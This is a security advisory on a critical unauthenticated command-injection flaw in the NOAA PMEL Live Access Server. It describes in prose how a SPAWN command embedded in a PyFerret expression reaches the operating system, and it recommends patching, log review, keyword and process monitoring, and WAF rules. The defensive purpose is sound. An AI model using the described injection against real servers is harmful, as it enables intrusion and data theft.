A critical remote code execution vulnerability has been identified in sites running the NOAA PMEL Live Access Server. An unauthenticated attacker can exploit this flaw remotely without any user interaction to execute arbitrary commands, potentially leading to a complete compromise of the affected server and the data it contains.

The NOAA PMEL Live Access Server (LAS) is susceptible to an injection vulnerability. The software fails to properly sanitize user-supplied data within requests that include PyFerret expressions. A remote, unauthenticated attacker can construct a specially crafted request that embeds a malicious SPAWN command within a PyFerret expression, which is then executed by the server's backend, resulting in arbitrary operating system command execution with the privileges of the LAS application.

This vulnerability is rated as critical severity with a CVSS score of 9.8. Successful exploitation grants an attacker full control over the affected server, which can lead to severe consequences such as theft, modification, or destruction of sensitive scientific data; interruption of critical services; and using the compromised server as a foothold to launch further attacks against the internal network. The potential for data breach, operational disruption, and reputational damage presents a significant risk to the organization.

Immediate Action: Immediately apply the vendor-supplied patch to all vulnerable systems. Update all instances of NOAA PMEL Live Access Server to a version that includes the patched 'gov.noaa.pmel.tmap.las.filter.RequestInputFilter.java' file. After patching, review web server and application access logs for any requests containing suspicious PyFerret expressions or the SPAWN command to identify potential past or ongoing exploitation attempts.

Proactive Monitoring: Implement enhanced monitoring on affected servers. Security teams should configure alerts for web requests containing keywords such as SPAWN or other shell commands within the request parameters. Monitor system processes for unusual child processes being spawned by the LAS application (e.g., sh, bash, cmd.exe, powershell). Network traffic should be monitored for unexpected outbound connections from the server, which could indicate a command-and-control (C2) channel.

Compensating Controls: If patching cannot be performed immediately, implement a Web Application Firewall (WAF) with a custom rule to inspect and block requests containing the malicious SPAWN command syntax. Restrict network access to the application to trusted IP addresses only. Employ egress filtering on the server's firewall to prevent it from making unauthorized outbound connections, which can mitigate the impact of a successful exploit.

Public Exploit Available: false

This vulnerability represents an immediate and severe risk to the organization. Given the critical 9.8 CVSS score, which indicates a remotely exploitable vulnerability requiring no user interaction, we strongly recommend that patching be treated as an emergency action and completed immediately. Although not currently listed on the CISA KEV list, its characteristics make it a prime candidate for future inclusion and active exploitation. Organizations must prioritize the remediation of this flaw to prevent a potential system compromise.